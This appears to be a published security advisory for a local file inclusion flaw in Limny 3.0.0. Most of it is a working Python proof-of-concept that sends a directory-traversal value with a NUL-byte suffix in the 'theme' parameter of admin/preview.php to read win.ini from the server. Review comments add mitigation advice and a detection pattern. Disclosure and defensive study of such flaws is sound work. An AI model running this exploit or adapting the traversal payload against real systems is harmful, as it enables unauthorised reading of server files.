Limny 3.0.0 Local File Inclusion

# ------------------------------------------------------------------------
# Software................Limny 3.0.0
# Vulnerability...........Local File Inclusion
# Threat Level............Critical (4/5)
# Download................http://www.limny.org/
# Discovery Date..........1/24/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
# 
# 
# --Description--
# 
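# A local file inclusion vulnerability in Limny 3.0.0 can be exploited
# to include arbitrary files. As the PoC request below shows, the affected
# input is the "theme" query parameter of admin/preview.php, which accepts
# directory-traversal sequences.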
# 
# 
# --PoC--

import httplib, urllib
 
# Target of the check: a local lab install (the advisory was tested on
# Windows Vista + XAMPP).
host = 'localhost'
path = '/limny-3.0.0'

# The "theme" query parameter of admin/preview.php is the input under test.
# '..%2F' is a URL-encoded '../'; it is repeated 32 times, and the value ends
# in a URL-encoded NUL byte.
# NOTE(review): the trailing %00 presumably cuts off a suffix the application
# appends to the theme path -- confirm against preview.php. PHP rejects NUL
# bytes in file paths from 5.3.4 onward, so that part depends on an older
# runtime; the traversal itself still has to be fixed in the application.
# Mitigation: accept only names of installed theme directories (allow-list)
# and never build an include path from raw request input.
# Detection: requests to admin/preview.php whose theme value contains '../',
# '..%2F' or '%00'.
traversal = '..%2F' * 32
endpoint = path + '/admin/preview.php?theme='
included_file = 'windows/win.ini%00'

conn = httplib.HTTPConnection(host)
conn.request('GET', endpoint + traversal + included_file)
resp = conn.getresponse()

# Status line first, then the raw body. A body carrying win.ini content would
# indicate that the include resolved outside the theme directory.
print('%s %s' % (resp.status, resp.reason))
print(resp.read())